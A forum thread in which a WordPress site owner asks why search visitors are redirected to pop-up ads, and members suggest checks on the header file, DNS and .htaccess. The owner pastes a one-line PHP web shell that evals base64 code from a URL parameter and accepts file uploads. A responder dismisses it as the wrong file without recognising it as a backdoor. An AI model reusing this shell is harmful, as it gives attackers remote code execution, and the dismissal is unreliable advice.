Welcome to BeerMoneyForum.com - BIGGEST MAKE MONEY FORUM ONLINE

Join us now to get access to all our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, and so, so much more. It's also quick and totally free, so what are you waiting for?
Blue
Red
Green
Orange
Voilet
Slate
Dark
  Guest viewing is limited

Why Is That My Website Has Pop Ads Even I Didn't Put It?

HJVC Notes

Emerald Member
LV
0
 
Joined
Oct 21, 2017
Messages
1,007
Reaction score
208
Points
150
Awards
4
BMF Points
$567
Rating - 100%
1   0   0

When I search 99percentreviews in Google and navigate onto it, it sends me to pop ads and back button doesn't help. But when I search again 99percentreviews in Google and navigate onto it, pop ads doesn't appear anymore. This happens in both non-incognito and incognito mode.
 
Check your header file. From line 18 to 21 is code which you must remove. Or you add it there or your hosting provider added. Here is screenshot. I see also it is near by some SEO pack it's possible you got ads inside pack.

Try so we can check other solutions.
45695
 
Check your header file. From line 18 to 21 is code which you must remove. Or you add it there or your hosting provider added. Here is screenshot. I see also it is near by some SEO pack it's possible you got ads inside pack.

Try so we can check other solutions.
View attachment 45695

I'm using Wordpress.org Twenty Ten theme. Koddos.net, my hosting and domain provider installed the Wordpress software in my site as I can't do it right. Can't find the lines you're referring to, below is the screenshot. Also, already uninstalled the SEO pack. What's your site diagnosis now? Thanks for the help.
45731
 
I still got ads. Do you have this line of code in header file? Scroll little down, it should be at start of body tag. I have same ads on my site but add it on purpose.
45759
 
I still got ads. Do you have this line of code in header file? Scroll little down, it should be at start of body tag. I have same ads on my site but add it on purpose.
View attachment 45759
Can't find that particular line of code in the header file. Below is the entire Header code.
<?php
/**
* Header template for our theme
*
* Displays all of the <head> section and everything up till <div id="main">.
*
* @package WordPress
* @subpackage Twenty_Ten
* @since Twenty Ten 1.0
*/
?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>" />
<title>
<?php
/*
* Print the <title> tag based on what is being viewed.
*/
global $page, $paged;

wp_title( '|', true, 'right' );

// Add the blog name.
bloginfo( 'name' );

// Add the blog description for the home/front page.
$site_description = get_bloginfo( 'description', 'display' );
if ( $site_description && ( is_home() || is_front_page() ) ) {
echo " | $site_description";
}

// Add a page number if necessary:
if ( ( $paged >= 2 || $page >= 2 ) && ! is_404() ) {
echo esc_html( ' | ' . sprintf( __( 'Page %s', 'twentyten' ), max( $paged, $page ) ) );
}

?>
</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo( 'stylesheet_url' ); ?>" />
<link rel="pingback" href="<?php echo esc_url( get_bloginfo( 'pingback_url' ) ); ?>">
<?php
/*
* We add some JavaScript to pages with the comment form
* to support sites with threaded comments (when in use).
*/
if ( is_singular() && get_option( 'thread_comments' ) ) {
wp_enqueue_script( 'comment-reply' );
}

/*
* Always have wp_head() just before the closing </head>
* tag of your theme, or you will break many plugins, which
* generally use this hook to add elements to <head> such
* as styles, scripts, and meta tags.
*/
wp_head();
?>
</head>

<body <?php body_class(); ?>>
<div id="wrapper" class="hfeed">
<div id="header">
<div id="masthead">
<div id="branding" role="banner">
<?php $heading_tag = ( is_home() || is_front_page() ) ? 'h1' : 'div'; ?>
<<?php echo $heading_tag; ?> id="site-title">
<span>
<a href="<?php echo esc_url( home_url( '/' ) ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a>
</span>
</<?php echo $heading_tag; ?>>
<div id="site-description"><?php bloginfo( 'description' ); ?></div>

<?php
// Compatibility with versions of WordPress prior to 3.4.
if ( function_exists( 'get_custom_header' ) ) {
/*
* We need to figure out what the minimum width should be for our featured image.
* This result would be the suggested width if the theme were to implement flexible widths.
*/
$header_image_width = get_theme_support( 'custom-header', 'width' );
} else {
$header_image_width = HEADER_IMAGE_WIDTH;
}

// Check if this is a post or page, if it has a thumbnail, and if it's a big one
if ( is_singular() && current_theme_supports( 'post-thumbnails' ) &&
has_post_thumbnail( $post->ID ) &&
( /* $src, $width, $height */ $image = wp_get_attachment_image_src( get_post_thumbnail_id( $post->ID ), 'post-thumbnail' ) ) &&
$image[1] >= $header_image_width ) :
// Houston, we have a new header image!
echo get_the_post_thumbnail( $post->ID );
elseif ( get_header_image() ) :
// Compatibility with versions of WordPress prior to 3.4.
if ( function_exists( 'get_custom_header' ) ) {
$header_image_width = get_custom_header()->width;
$header_image_height = get_custom_header()->height;
} else {
$header_image_width = HEADER_IMAGE_WIDTH;
$header_image_height = HEADER_IMAGE_HEIGHT;
}
?>
<img src="<?php header_image(); ?>" width="<?php echo esc_attr( $header_image_width ); ?>" height="<?php echo esc_attr( $header_image_height ); ?>" alt="" />
<?php endif; ?>
</div><!-- #branding -->

<div id="access" role="navigation">
<?php /* Allow screen readers / text browsers to skip the navigation menu and get right to the good stuff */ ?>
<div class="skip-link screen-reader-text"><a href="#content" title="<?php esc_attr_e( 'Skip to content', 'twentyten' ); ?>"><?php _e( 'Skip to content', 'twentyten' ); ?></a></div>
<?php /* Our navigation menu. If one isn't filled out, wp_nav_menu falls back to wp_page_menu. The menu assiged to the primary position is the one used. If none is assigned, the menu with the lowest ID is used. */ ?>
<?php
wp_nav_menu(
array(
'container_class' => 'menu-header',
'theme_location' => 'primary',
)
);
?>
</div><!-- #access -->
</div><!-- #masthead -->
</div><!-- #header -->

<div id="main">
 
Your site has been taken over. If you paste this link into your browser - view-source:http://99percentreviews.com/ - you can see someone has set up a redirect:
IeMTWItu

It seems that your website does eventually load after a few requests.

Can you show us any addons or themes you may have installed in past or have installed now? Also, it would be helpful if you could give us a list of everything you use for your site (put it in a pastebin).
 
Your site has been taken over. If you paste this link into your browser - view-source:http://99percentreviews.com/ - you can see someone has set up a redirect:
IeMTWItu

It seems that your website does eventually load after a few requests.

Can you show us any addons or themes you may have installed in past or have installed now? Also, it would be helpful if you could give us a list of everything you use for your site (put it in a pastebin).
No more plugins installed. I insert the PropellerAds ad code before in Twenty Nineteen theme but I'm using now Twenty Ten theme. Aside from Wordpress.org widgets, I don't use anything. Don't know how to use Pastebin (sorry).
45764
 
Sorry I can't help anymore, I can't find anything weird so far. Who is your hosting provider? If you use free hosting they often add ads on sites. Sometimes they don't mentioned it in TOS.
 
Sorry I can't help anymore, I can't find anything weird so far. Who is your hosting provider? If you use free hosting they often add ads on sites. Sometimes they don't mentioned it in TOS.
Appreciate your help. Koddos.net is my hosting and domain provider. I'm paying about 5 USD every month.
 
Did you had similar problems so far? I can't find anything related to hosting with similar problems so it's not probably on their side but still you should try contact support. Maybe they can help.
 
Did you had similar problems so far? I can't find anything related to hosting with similar problems so it's not probably on their side but still you should try contact support. Maybe they can help.
They said my site doesn't have pop ads. But when I search the keywords in Google and navigate onto it, it directs me to pop-ads. I already tried to change the theme.
 
When I search 99percentreviews in Google and navigate onto it, it sends me to pop ads and back button doesn't help.

Same in DuckDuckGo (my default search engine as I don't trust all that spying Google sh*t).

You and other users here tried almost everything possible to sort your trouble, so I have just add very rare possibilities to solve this situation:

1) Did you verified your DNS entries in webhosting control panel (probably except for mail settings)? Everything else than 99percentreviews.com should be considered as suspicious. Be extremely careful, as setting wrong values can/will render your site unusable. Better consult it with your hosting company.

2) Did you try to browse to your site with javascript disabled? Before that you have to flush browser cache.

Have good luck :Thumbsup:
 
Same in DuckDuckGo (my default search engine as I don't trust all that spying Google sh*t).

You and other users here tried almost everything possible to sort your trouble, so I have just add very rare possibilities to solve this situation:

1) Did you verified your DNS entries in webhosting control panel (probably except for mail settings)? Everything else than 99percentreviews.com should be considered as suspicious. Be extremely careful, as setting wrong values can/will render your site unusable. Better consult it with your hosting company.

2) Did you try to browse to your site with javascript disabled? Before that you have to flush browser cache.

Have good luck :Thumbsup:

I almost forgot:

3) Check your .htaccess file for directive/s that could redirect users to another site, mostly ads and phishing ones.
 
1) Did you verified your DNS entries in webhosting control panel (probably except for mail settings)? Everything else than 99percentreviews.com should be considered as suspicious. Be extremely careful, as setting wrong values can/will render your site unusable. Better consult it with your hosting company.
Support ticket submitted to my hosting provider.

2) Did you try to browse to your site with javascript disabled? Before that you have to flush browser cache.
Sometimes in other computers, pop ads doesn't appear.

3) Check your .htaccess file for directive/s that could redirect users to another site, mostly ads and phishing ones.
How to do that?
 
Login to Cpanel, Search for File Manager and in root is .htaccess file. Or using FTP credentials, use FTP client like FileZilla or something similar and access to server and find .htaccess file.
 
How to do that?

Thanks @zeljko for clarifying, just note that .htaccess file is a hidden one, so you would need to set FTP client to display ALL files.

Anyway, let us know if something does or doesn't work for you.
 
Login to Cpanel, Search for File Manager and in root is .htaccess file. Or using FTP credentials, use FTP client like FileZilla or something similar and access to server and find .htaccess file.
This what appears:
<?php error_reporting(0);$ev=$_GET["ev"];if(isset($ev)&&!empty($ev)){eval(base64_decode($ev));exit;}(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])); ?>

45879


45878


Thanks @zeljko for clarifying, just note that .htaccess file is a hidden one, so you would need to set FTP client to display ALL files.

Anyway, let us know if something does or doesn't work for you.
My hosting provider told me that there are no pop ads and DNS entries are fine - https://intodns.com/99percentreviews.com
 
This what appears:
<?php error_reporting(0);$ev=$_GET["ev"];if(isset($ev)&&!empty($ev)){eval(base64_decode($ev));exit;}(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])); ?>

View attachment 45879

View attachment 45878


My hosting provider told me that there are no pop ads and DNS entries are fine - https://intodns.com/99percentreviews.com

That is not the correct file ;) try searching for ".htaccess", I guess it will be located in "public_html" folder, where are all of your public accessible files placed.

The DNS entries are OK, I didn't found any suspicious entry.
 

📢 Recommended Partners

MGID - Native Performance & Programmatic Advertising Platform MGID Team
0.00 star(s) 0 ratings
Updated
Roobet.com | Crypto’s Fastest Growing Casino 🦘 Roobet.com
0.00 star(s) 0 ratings
Updated
Duckdice.io - Top Crypto Gambling - Bitcoin Dice DuckDice.io
0.00 star(s) 0 ratings
Updated
BMFAds.com - Advertise and Monetize Your CPC, CPM, POP Traffic BMF Staff
4.00 star(s) 4 ratings
Updated

banner

REWARDS: Active Raffles


  • 🤑 Roll 3: Win 100,000 BMF Points!

    The entry period for this raffle ends in..
Back
Top Bottom

Earnings Disclaimer:  All the posts published herein are merely based on individual views, and they do not expressly or by implications represent those of BeerMoneyForum.com or its owner. It is hereby made clear that BeerMoneyForum.com does not endorse, support, adopt or vouch any views, programs and/or business opportunities posted herein. BeerMoneyForum.com also does not give and/or offer any investment advice to any members and/or it's readers. All members and readers are advised to independently consult their own consultants, lawyers and/or families before making any investment and/or business decisions. This forum is merely a place for general discussions. It is hereby agreed by all members and/or readers that BeerMoneyForum.com is in no way responsible and/or liable for any damages and/or losses suffered by anyone of you.